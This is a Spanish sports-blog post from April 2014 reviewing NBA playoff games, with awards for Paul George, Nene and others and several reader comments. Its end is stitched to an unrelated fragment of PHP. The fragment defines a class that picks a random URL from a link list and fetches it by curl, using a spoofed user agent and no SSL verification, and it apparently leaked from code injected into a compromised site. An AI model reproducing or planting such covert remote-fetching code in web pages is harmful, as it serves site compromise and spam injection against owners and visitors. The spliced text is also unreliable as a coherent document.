La Crónica: ¿Vuelven los Pacers?

23 de April de 2014 por txusma

Durante toda la primera parte los Pacers se vieron con el agua al cuello. Paul George y Luis Scola aguantaban a un equipo que llegó por detrás en el marcador al descanso y veía como se hacían realidad hasta sus peores pesadillas. Algo se debieron decir en el vestuario porque el espíritu y la actitud con la que saltaron a la cancha en el tercer cuarto cambiaron radicalmente. De repente, aquellos Pacers que asombraban a la liga hace unos meses habían reaparecido. Volvió la defensa que tantas alegría les había dado en partidos anteriores y dejaron a los Hawks en 33 puntos en toda la 2ª parte dándose cuenta, probablemente, de que no hace falta prácticamente nada para imponerse a Atlanta. Que se olviden de strippers, de tríos, de malos rollos… y que miren adelante porque a lo mejor pasarán muchos años antes de verse en otra situación como esta.

Los Raptors también empataron su serie en un partido en el que Demar DeRozan apareció en los momentos decisivos. Se ha pasado 1 partido y 3 cuartos sesteando pero ayer, en el último cuarto, anotó 17 puntos, muchos de ellos cuando el balón más quemaba. Los 20000 aficionados que abarrotaban el Air Canada Center disfrutaron de lo lindo y llevaron en volandas a sus jugadores a la victoria.

Los que no fueron capaces de empatar su serie aún jugando en casa fueron los Bulls. Parece mentira que justo ahora su defensa se venga abajo y de que fallen en los momentos en que se supone deberían arrasar a los yogurines de los Wizards. Los visitantes dominaron toda la primera parte y llegaron a ganar de 17 puntos pero Chicago le dio la vuelta al marcador y ganaba de 10 puntos a falta de unos 7 minutos. En condiciones normales un equipo experimentado como los Bulls debería imponerse fácilmente a un equipo joven al que acaban de remontar una importante ventaja y que además ya ha cumplido ganando un partido a domicilio pero sucedió lo contrario. Bradley Beal lideró un parcial de 14-4 para los Wizards que llevaba el partido a la prórroga. Y en el tiempo extra de nuevo las tornas cambiadas: Nene anotó 6 puntos y sus compañeros no fallaron ni un tiro libre mientras que los locales no eran capaces de imponerse. El mundo al revés. 

PREMIOS

MVP: Paul George deberá jugar muchos partidos al nivel que mostró ayer si quiere que los Pacers peleen de verdad por el anillo. Nos recordó al de la primera parte de la temporada con 27 puntos, 10 rebotes, 6 asistencias y 4 robos.

Sorpresa: Otra vez Nene. No estuvo al nivel del primer partido pero apareció cuando más falta le hacía a su equipo. Anotó los primeros 6 puntos de su equipo en la prórroga y acabó con 17 puntos y 7 rebotes. Por su parte, Luis Scola mantuvo a los Pacers en el partido cuando peor lo estaban pasando en la primera parte. Al final anotó 20 puntos en 19 minutos.

Decepción: En estos momentos, Roy Hibbert (6p – 4r) no encontraría acomodo ni en equipos de Euroliga. Auténtico expediente X la involución del pívot de los Pacers. Paul Pierce y Terrence Ross tampoco vivieron una buena noche. El de los Nets anotó 2 canastas de 11 intentos y el de los Raptors 1 de 8.

Esfuerzo en vano: Joakim Noah no debe creer lo que ven sus ojos. Su equipo va 0-2 en la eliminatoria y la defensa de los Bulls hace aguas en el peor momento. Anoche el francés recuperó un poco el tono (20 puntos, 12 rebotes, 3 asistencias y 2 tapones).

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Comentabais que en el tramo final de temporada a los Bulls se les veía en un periodo de declive,este 2-0 lo acaba de confirmar del todo.Para mí sorpresón,y para los Nets también,¿qué preferirán a los actuales Bulls o a los Raptors?De todas formas se hace difícil pensar en una barrida de Washington.

    Indiana muy bien,OK,pero ojito al jeto de Stephenson cada vez que pisaba el banquillo (compartió muchos minutos con la segunda unidad).En realidad no lo pisaba, se ponía de pie al margen de los suplentes,con un rostro serio y transmitiendo una pésima sensación de estar pensando en si mismo a estas alturas de la temporada.

      Citar

  2. Mamba_Blanca dice:
    #2

    Dragic ha sido nombrado MIP.

    En mi opinion justo reconocimineto a los Suns, ya que tras no haber entrado en playoff y no haberle dado el COY a Hornacek, este les tocaba a ellos.

    Puede que no sea el mayor aumento de números de todos los cadidatos, pero la temporada del esloveno ha sido magnifica, ya que ha tenido a los Suns peleando hasta el último partido y que suplió la lesión de Blesdoe de maravilla

      Citar

  3. Esteban dice:
    #3

    muy merecido el MIP para Gragic, es cierto que su salto promedios no es muy llamativo, pero igualmente es significativo, y mas aun si vemos que no es ni remotamente parecido hacer 14 puntos de promedio en un pesimo equipo con los Suns del año pasado y hacer 20 por partido en la revelacion de la liga, que en caso de haber estado en la conferencia este hubiesen terminado en la tercera colocacion

      Citar

  4. Sancho88 dice:
    #4

    6-2 Bulls en abril. Declive por qué?

      Citar

  5. rumbero dice:
    #5

    El final de partido de Beal es tremendo. De hecho fuerza la prórroga casi él solito. Yo pensaba que le iban a pesar esos 20 años en sus primeros PO pero de momento parece que no. Y eso que aún a pesar de no defender nada bien parecía que los Bulls tenían más o menos controlado el final pero un par de malas decisiones de DJ y Hinrich y al garete. Y Butler jugando 44 minutos el primer partido y 53 en el segundo. Marathon Man

      Citar

  6. Ruxixon dice:
    #6

    Sancho88:
    6-2 Bulls en abril. Declive por qué?

    Declive igual no era la palabra,no mostraban el estado físico que habían mantenido durante larga parte de la temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>